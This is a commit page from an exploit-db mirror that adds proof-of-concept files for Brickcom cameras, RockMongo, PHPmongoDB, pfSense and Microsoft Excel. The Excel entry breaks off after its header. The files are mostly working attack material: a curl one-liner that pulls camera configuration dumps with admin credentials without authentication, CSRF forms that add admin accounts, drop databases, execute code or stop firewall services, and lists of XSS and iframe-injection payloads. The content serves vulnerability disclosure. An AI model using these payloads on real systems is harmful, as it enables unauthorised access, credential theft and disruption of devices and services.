bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-04-15

Browse source 
6 new exploits

RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities
Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)
pfSense Firewall <= 2.2.6 - Services CSRF
Brickcom Corporation Network Cameras - Multiple Vulnerabilities
PHPmongoDB 1.0.0 - Multiple Vulnerabilities
Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
This commit is contained in:
Offensive Security 2016-04-15 05:03:51 +00:00
parent 1e62f55c1a
commit b185ddf9b2
7 changed files with 1468 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
files.csv
View file

@ -35902,6 +35902,7 @@ id,file,description,date,author,platform,type,port
39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
@ -35911,3 +35912,8 @@ id,file,description,date,author,platform,type,port
39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088
39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0
39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 File Upload",2016-04-13,metasploit,unix,remote,0
39694,platforms/windows/dos/39694.txt,"Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,dos,0
39695,platforms/php/webapps/39695.txt,"pfSense Firewall <= 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443
39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80
39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80
39698,platforms/windows/remote/39698.html,"Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0

Can't render this file because it is too large.

394
platforms/hardware/webapps/39696.txt Executable file
View file

@ -0,0 +1,394 @@
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-12
www.orwelllabs.com
twt:@orwelllabs
sm1thw@0rw3lll4bs:~/bb# ./Bruce.S
[+] surveillance is the business model
of the internet - OK!
sm1thw@0rw3lll4bs:~/bb# echo $?
6079
Adivisory Information
=====================
Vendor: Brickcom Corporation
CVE-Number:N/A
Adivisory-URL:
http://www.orwelllabs.com/2016/04/Brickcom-Multiple-Vulnerabilities.html
OLSA-ID: OLSA-2015-12-12
Impact: High (especially because some of these products are used in
critical environments.)
Remote: Yes
p4n0pt1c0n
I. Insecure Direct Object Reference/Authentication Bypass
II. Sensitive information in plaintext
III. Hard-coded Credentials
IV. Cross-site scripting
V. Basic Authentication
VI. Cross-site Request Forgery
Background
----------
Brickcom (calls itself) as a "leading network video manufacturer in the IP
surveillance industry.
Dedicated to providing the best IP surveillance solutions with a solid
foundation for engineering
quality network video equipment with a Research and Development Department
that has been producing
wireless broadband networking equipment for over twenty years."
These products are used as video surveillance system by costumers and
important sectors such as the Thai 4ir F0rce, as can be seen on the
Vendor's web site.
* notes:
- some firmwares affected (item 'affected products' are very recent, having
been launched
a few months ago, and still vulnerable ... so this is an structural/legacy
problem.
- sensitive information presented in this advisory are fake.
I. Insecure Direct Object Reference/Authentication Bypass
---------------------------------------------------------
(+) affected scripts
- configfile.dump
- syslog.dump
Path: Maintenance -> Configuration -> 'Export'
+ configfile.dump
An unauthenticated GET request to the script "configfile.dump", as follows:
http://xxx.xxx.xxx.xxx/configfile.dump?action=get
or like this
http://xxx.xxx.xxx.xxx/configfile.dump.backup
http://xxx.xxx.xxx.xxx/configfile.dump.gz
or just
http://xxx.xxx.xxx.xxx/configfile.dump
returns all camera settings
[..code_snip..]
DeviceBasicInfo.firmwareVersion=v3.0.6.12
DeviceBasicInfo.macAddress=00:00:00:00:00:00
DeviceBasicInfo.sensorID=OV9X11
DeviceBasicInfo.internalName=Brickcom
DeviceBasicInfo.productName=Di-1092AX
DeviceBasicInfo.displayName=CB-1092AX
DeviceBasicInfo.modelNumber=XXX
DeviceBasicInfo.companyName=Brickcom Corporation
DeviceBasicInfo.comments=[CUBE HD IPCam STREEDM]
DeviceBasicInfo.companyUrl=www.brickcom.com
DeviceBasicInfo.serialNumber=AXNB02B211111
DeviceBasicInfo.skuType=LIT
DeviceBasicInfo.ledIndicatorMode=1
DeviceBasicInfo.minorFW=1
DeviceBasicInfo.hardwareVersion=
DeviceBasicInfo.PseudoPDseProdNum=P3301
AudioDeviceSetting.muted=0
[..code_snip..]
and all credentials including the administrator account, like this:
UserSetSetting.userList.size=2
UserSetSetting.userList.users0.index=0
UserSetSetting.userList.users0.password=MyM4st3rP4ss <<<--- admin pass
UserSetSetting.userList.users0.privilege=1
UserSetSetting.userList.users0.username=Cam_User <<<--- admin user
UserSetSetting.userList.users1.index=0
UserSetSetting.userList.users1.password=C0mm0mP4ss <<<--- (commom) user
pass
UserSetSetting.userList.users1.privilege=1
UserSetSetting.userList.users1.username=User_name <<<--- (commom)
username
UserSetSetting.userList.users2.index=0
UserSetSetting.userList.users2.password=[..code_snip..]
[snip]
BasicNetworkSetting.pppoe.password= <<<--- ppoe user
BasicNetworkSetting.pppoe.username= <<<--- ppoe pass
UPnPSetting.enabled=1
UPnPSetting.name=CB-102Ap-1ffc3
Brickcom.enabled=1
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username= <<<--- dyndns user
DDNSSetting.dyndns.password= <<<--- dyndns password
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username= <<<--- and here...
DDNSSetting.tzodns.password= <<<--- here....
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username= <<<--- here
DDNSSetting.noipdns.password= <<<--- here
DDNSSetting.noipdns.hostname=
and many others...
- Path: System -> System Log -> 'Save to File'
+ syslog.dump
- Request:
(unauthenticated) GET http://xxx.xxx.xxx.xxx/syslog.dump?action=get
- Response:
[..code_snip..]
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:13:36 2014
LOG_NOTICE-WebServer :User '[admin]' logged in to [web server], Sat Mar 1
21:11:02 2014
[..code_snip..]
Proof of Concept
`````````````````
Online Bash exploit-p0c:
curl -s -O http://xxx.xxx.xxx.xxx/configfile.dump && grep "users0"
configfile.dump|awk '{ FS="."; } { print $4; }' || echo -e "[-] The target
seems not be vulnerable, Mr. Robot! \n"
IF target (xxx.xxx.xxx.xxx) is vulnerable the exploit will show a username,
password and privilege level (1:admin), like this:
password=4adm1niS3cr3tP4ss
privilege=1
username=BrickcomADMIN
and a configfile.dump with all credentials, settings, etc. will be recorded
locally.
IF not vulnerable, you'll see the message:
"[-] The target seems not bet vulnerable, Mr. Robot!"
II. sensitive information in plaintext
--------------------------------------
As shown, there are countless cases where credentials and other sensitive
information are store in plaintext.
III. Hard-coded Credentials
---------------------------
All credentials and other sensitive information can be found in html page
user_management_config.html,
Just viewing the html source code:
view-source:http://{xxx.xxx.xxx.xxx}/user_management_config.html
<script type="text/javascript">
var Edit_id="";
var userSet_size="5"
var User_index=new Array(10);
var User_username=new Array(10);
var User_password=new Array(10);
var User_privilege=new Array(10);
User_index[0]="1";
User_username[0]="admin"; <<<----
User_password[0]="admin"; <<<----
User_privilege[0]="1";
User_index[1]="2";
User_username[1]="masteruser"; <<<----
User_password[1]="masterP4sss1*"; <<<----
User_privilege[1]="0";
IV. Cross-site scripting
------------------------
(+) Script: /cgi-bin/NotificationTest.cgi
(+) Param: action=
REQUEST: http://xxx.xxx.xxx.xxx/cgi-bin/NotificationTest.cgi?action=[ **
XSS
**]&addressType=&hostname=h0stn4mE&ipAddress=xxx.xxx.xxxx.xxx&ipv6Address=&portNo=&accountName=brickcom&password=brickcom&ShareDIR=
V. Basic Authentication
-----------------------
The response asks the user to enter credentials for Basic HTTP
authentication.
If these are supplied, they will be submitted over clear-text HTTP (in
Base64-encoded form).
V. Cross-site Request Forgery
-----------------------------
# To add an administrative credential: "brickcom:brickcom"
> Privilege levels:
- visor : 0
- admin : 1
- visor remoto : 2
<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="index" value="0" />
<input type="hidden" name="username" value="brickcom" />
<input type="hidden" name="password" value="brickcom" />
<input type="hidden" name="privilege" value="1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
# to remove this credential:
<html>
<!-- Brickcom FB-100Ae IP Box Camera- CSRF PoC -->
<body>
<form action="http://{xxx.xxx.xxx.xxx}/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="username" value="brickcom" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
affected products
-----------------
(+) various products, including models:
Brickcom FB-100Ae IP Box Camera - Firmware Version: v3.0.6.12
(release:09/08/2010 14:46)
Brickcom WCB-100Ap Wireless Camera - Firmware Version: v3.0.6.26
(release:01/21/2011 18:31)
Vandal Dome Cameras
-------------------
Brickcom VD-202Ne Vandal Dome Camera - Firmware Version: v37019_Promise
(release:2015-10-01_18:46:07)
Brickcom VD-300Np Vandal Dome Camera - Firmware Version: v3.7.0.23T
(release:2016-03-21_10:08:24)
Brickcom VD-E200Nf Vandal Dome Camera - Firmware Version: v3.7.0.5T
(release:2015-06-25_11:18:07)
Bullet Cameras
--------------
Brickcom OB-202Ne Bullet Camera - Firmware Version: v3.7.0.18R
(release:2015-09-08_18:40:11)
Brickcom OB-E200Nf Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-16_11:36:46)
Brickcom OB-200Np-LR Bullet Camera - Firmware Version: v3.7.0.18.3R
(release:2015-10-15_11:30:46)
Brickcom OB-500Ap Bullet Camera - Firmware Version: v3.7.0.1cR
(release:2016-01-18_10:07:03)
Brickcom GOB-300Np Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.17A (release: 2015-07-10_11:36:41)
Brickcom OB-200Np-LR Bullet Camera (Unique Series) - Firmware Version:
v3.7.0.18.3R (release: 2015-10-15_11:30:46)
Mini Dome Camera
----------------
Brickcom MD-300Np Mini Dome Camera - Firmware Version: v3.2.2.8
(release:2013-08-01)
Cube Camera
-----------
Brickcom CB-102Ae V2 Cube Camera - Firmware Version: v3.0.6.12 (release:
09/07/2010 11:45)
Fixed Dome Camera
-----------------
Brickcom FD-202Ne Fixed Dome Camera - Firmware Version:v3.7.0.17R
(release: 2015-08-19_18:47:31)
Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
Timeline
++++++++
2015-03-20 - Issues discovered
2015-03-30 - attempt to contact Vendor
2015-12-12 - attempt to assign CVE
2016-04-12 - Not easy way to contact vendor, (ON Twitter) the last tweet
was 2011-01-31...
2016-04-14 - Full disclosure
About Orwelllabs
++++++++++++++++
Orwelllabs is a (doubleplusungood) security research lab interested in
embedded device & webapp hacking &&
aims to create some intelligence around this vast and confusing picture
that is the Internet of things.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----

394
platforms/php/webapps/39682.txt Executable file
View file

@ -0,0 +1,394 @@
#########################################################################################################################################################
# Exploit Title: RockMongo v1.1.8 - PHP MongoDB Administrator Multiple
Vulnerabilities
# Date: 11.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://rockmongo.com
# Software Link: https://github.com/iwind/rockmongo
# Version: [app version] 1.1.8
#########################################################################################################################################################
What is RockMongo?
RockMongo, a MongoDB administration tool, written in PHP5, is Best in PHP
world, more like PHPMyAdmin. source = http://rockmongo.com
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)
XSS details:
#########################################################################################################################################################
XSS1 (Reflected)
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#########################################################################################################################################################
XSS2 (Reflected)
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
db
PAYLOAD
"><script>alert(1)</script>
#########################################################################################################################################################
XSS3 (Reflected)
URL
http://localhost/rockmongo/index.php?action=server.createDatabase
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(3)</script>
#########################################################################################################################################################
XSS4 (Stored)
URL
http://localhost/rockmongo/index.php?action=db.newCollection&db=test
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#########################################################################################################################################################
XSS5 (Reflected)
URL
http://localhost/rockmongo/index.php?action=server.command&db=test
METHOD
Post
PARAMETER
db
PAYLOAD
<script>alert(5)</script>
#########################################################################################################################################################
XSS6 (Reflected)
URL
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=test&collection=system.indexes%3Cscript%3Ealert%286%29%3C/script%3E
METHOD
Get
PARAMETER
collection
PAYLOAD
<script>alert(6)</script>
#########################################################################################################################################################
XSS7 (Reflected)
URL
http://localhost/rockmongo/index.php?action=collection.index&collection=system.indexes&command=findAll&criteria=%22%3E%3Cscript%3Ealert%287%29%3C/script%3E&db=test&field[0]=_id&format=array&limit=0&order[0]=asc&pagesize=10&query_fields[0]=v
METHOD
Get
PARAMETER
criteria
PAYLOAD
"><script>alert(7)</script>
#########################################################################################################################################################
XSS8 (Reflected)
URL
http://localhost/rockmongo/index.php/"><script>alert(8)</script>
METHOD
Get
PARAMETER
URL
PAYLOAD
"><script>alert(8)</script>
#########################################################################################################################################################
HTML Injection details:
#########################################################################################################################################################
HTML Injection1
URL
http://localhost/rockmongo/index.php?action=login.index
METHOD
Post
PARAMETER
username,db
PAYLOAD
"><iframe src=http://www.rockmongo.com></iframe>
#########################################################################################################################################################
HTML Injection2
URL
http://localhost/rockmongo/index.php?action=server.createDatabase
METHOD
Post
PARAMETER
name
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection3 (Stored)
URL
http://localhost/rockmongo/index.php?action=db.newCollection&db=test
METHOD
Post
PARAMETER
name
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection4
URL
http://localhost/rockmongo/index.php?action=server.command&db=test
METHOD
Post
PARAMETER
db
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection5
URL
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=test&collection=system.indexes%3Ciframe%20src=http://www.rockmongo.com%3E
METHOD
Get
PARAMETER
collection
PAYLOAD
<iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
HTML Injection6
URL
http://localhost/rockmongo/index.php?action=collection.index&collection=system.indexes&command=findAll&criteria=%22%3E%3Ciframe%20src=http://www.rockmongo.com%3E&db=test&field[0]=_id&format=array&limit=0&order[0]=asc&pagesize=10&query_fields[0]=v
METHOD
Get
PARAMETER
criteria
PAYLOAD
"><iframe src=http://www.rockmongo.com>
#########################################################################################################################################################
CSRF details:
#########################################################################################################################################################
CSRF1
Create Database
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.createDatabase"
method="POST">
<input type="text" name="name" value="exploit-db" />
<input type="submit" value="Create DB" />
</form>
</body>
</html>
#########################################################################################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.dropDatabase" method="POST">
<input type="text" name="db" value="exploit-db"/>
<input type="hidden" name="confirm" value="1"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF3
Create Collection
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.newCollection&db=exploit-db"
method="POST">
<input type="text" name="name" value="exploit-Collection" />
<input type="submit" value="Create Collection" />
</form>
</body>
</html>
#########################################################################################################################################################
CSRF4
Drop Collection
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=collection.removeCollection&db=exploit-db"
method="POST">
<input type="text" name="collection" value="exploit-Collection"/>
<input type="submit" value="Drop Collection"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF5
Add Database User
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.addUser&db=admin"
method="POST">
<input type="text" name="username" value="test"/>
<input type="text" name="password" value="test"/>
<input type="text" name="password2" value="test"/>
<input type="submit" value="Add User"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF6
Delete Database User
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=db.deleteUser&db=admin"
method="POST">
<input type="text" name="user" value="test"/>
<input type="submit" value="Remove User"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF7
Command Execute
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.command&" method="POST">
<input type="text" name="command" value="{ listCommands: 1 }"/>
<input type="text" name="db" value="admin"/>
<input type="text" name="format" value="json"/>
<input type="submit" value="Command Execute"/>
</form>
</body>
</html>
#########################################################################################################################################################
CSRF8
Execute Code
<html>
<body>
<form action="
http://localhost/rockmongo/index.php?action=server.execute&db=admin"
method="POST">
<input type="text" name="code" value="function () { var plus = 1 + 2;
return plus; }"/>
<input type="text" name="db" value="admin"/>
<input type="submit" value="Execute Code"/>
</form>
</body>
</html>
#########################################################################################################################################################

77
platforms/php/webapps/39695.txt Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery
# Exploit Author: Aatif Shahdad
# Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz
# Version: 2.2.6 and below.
# Contact: https://twitter.com/61617469665f736
# Category: webapps
1. Description
An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall.
2. Proof of Concept
Login to the Web Console, for example, http://192.168.0.1 (set at the time of install) and open the following POCs:
Start NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="startservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Stop NTPD service:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Restart NTPD service:
POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="restartservice" />
<input type="hidden" name="service" value="ntpd" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The service will automatically start/stop.
Note: That NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC:
<html>
<body>
<form action="https://192.168.0.1/status_services.php">
<input type="hidden" name="mode" value="stopservice" />
<input type="hidden" name="service" value="apinger" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Solution:
Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads

283
platforms/php/webapps/39697.txt Executable file
View file

@ -0,0 +1,283 @@
#################################################################################################################################################
# Exploit Title: PHPmongoDB v1.0.0 - Multiple Vulnerabilities [CSRF |
HTML(or Iframe) Injection | XSS (Reflected & Stored)]
# Date: 14.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.phpmongodb.org
# Software Link: https://github.com/phpmongodb/phpmongodb
# Version: 1.0.0
#################################################################################################################################################
Introduction
A Tool available for administrative work of MongoDB over Web. It is
PHPmongoDB. source = http://www.phpmongodb.org
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored)
CSRF details:
#################################################################################################################################################
CSRF1
Create Database
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Save"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>
#################################################################################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="db" value="db"/>
<input type="text" name="load" value="Database/Drop"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#################################################################################################################################################
CSRF3
Create Collection
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/CreateCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value="Create Collection"/>
</form>
</body>
</html>
#################################################################################################################################################
Drop Collection
<html>
<body>
<form action="http://localhost/phpmongodb/index.php" method="POST">
<input type="text" name="collection" value="testcollection"/>
<input type="text" name="load" value="Collection/DropCollection"/>
<input type="text" name="db" value="db"/>
<input type="submit" value=Drop Collection"/>
</form>
</body>
</html>
#################################################################################################################################################
Execute Code
<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Server/Execute"
method="POST">
<input type="text" name="code" value="db.getCollectionNames()"/>
<input type="text" name="db" value="db"/>
<input type="submit" value=Execute Code"/>
</form>
</body>
</html>
#################################################################################################################################################
Logout
<html>
<body>
<form action="http://localhost/phpmongodb/index.php?load=Login/Logout"
method="POST">
<input type="submit" value="Logout"/>
</form>
</body>
</html>
#################################################################################################################################################
HTML Injection details:
#################################################################################################################################################
HTML Injection1
URL
http://localhost/phpmongodb/index.php/%22%3E%3Ciframe%20src=http://www.phpmongodb.org%3E
METHOD
Get
PARAMETER
URL
PAYLOAD
/"><iframe src=http://www.phpmongodb.org>
#################################################################################################################################################
HTML Injection2
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E&db=local
METHOD
Get
PARAMETER
collection
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
#################################################################################################################################################
HTML Injection3
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
METHOD
Get
PARAMETER
db
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
#################################################################################################################################################
HTML Injection4 (Stored)
URL
http://localhost/phpmongodb/index.php
METHOD
Post
PARAMETER
collection
PAYLOAD
%253E%253Ciframe%2520src%253Dhttp%253A%252f%252fwww.phpmongodb.org%253E
Request
POST /phpmongodb/index.php HTTP/1.1
collection=testcollection%253E%253Ciframe%2520src%253Dhttp%253A%252f%
252fwww.phpmongodb.org
%253E&size=&max=&load=Collection%2FCreateCollection&db=db&save=
#################################################################################################################################################
XSS details:
#################################################################################################################################################
XSS1 (Reflected)
URL
http://localhost/phpmongodb/index.php/%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
METHOD
Get
PARAMETER
URL
PAYLOAD
/"><script>alert(1)</script>
#################################################################################################################################################
XSS2 (Reflected)
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes%253cscript%253ealert%25282%2529%253c%252fscript%253e&db=local
METHOD
Get
PARAMETER
collection
PAYLOAD
%253cscript%253ealert%25282%2529%253c%252fscript%253e
#################################################################################################################################################
XSS3 (Reflected)
URL
http://localhost/phpmongodb/index.php?size=&load=Collection%2fCreateCollection&max=&capped=on&collection=system.indexes&db=local%253cscript%253ealert%25283%2529%253c%252fscript%253e
METHOD
Get
PARAMETER
db
PAYLOAD
%253cscript%253ealert%25283%2529%253c%252fscript%253e
#################################################################################################################################################
XSS4 (stored)
URL
http://localhost/phpmongodb/index.php
METHOD
Post
PARAMETER
collection
PAYLOAD
%253Cscript%253Ealert%25284%2529%253C%252fscript%253E
Request
POST /phpmongodb/index.php HTTP/1.1
collection=testcollection%253Cscript%253Ealert%25284%2529%253C%252fscript%253E&size=&max&load=Collection%2FCreateCollection&db=db&save=
#################################################################################################################################################
XSS5 (Stored)
http://localhost/phpmongodb/index.php?load=Server/Execute
METHOD
Post
PATAMETER
db
PAYLOAD
%253Cscript%253Ealert%25285%2529%253C%252fscript%253E
Request
POST /phpmongodb/index.php?load=Server/Execute HTTP/1.1
code=db.getCollectionNames%28%29&db=db%253Cscript%253Ealert%25285%2529%253C%252fscript%253E
#################################################################################################################################################

50
platforms/windows/dos/39694.txt Executable file
View file

@ -0,0 +1,50 @@
#######################################################################################
# Title: Microsoft Office Excel Out-of-Bounds Read Remote Code Execution
# Application: Microsoft Office Excel
# Affected Products: Microsoft Office Excel 2007,2010,2013,2016
# Software Link: https://products.office.com/en-ca/excel
# Date: April 12, 2016
# CVE: CVE-2016-0122 (MS16-042)
# Author: Sébastien Morin from COSIG
# Contact: https://twitter.com/COSIG_ (@COSIG_)
# Personal contact: https://smsecurity.net/; https://twitter.com/SebMorin1 (@SebMorin1)
#######################################################################################
===================
Introduction:
===================
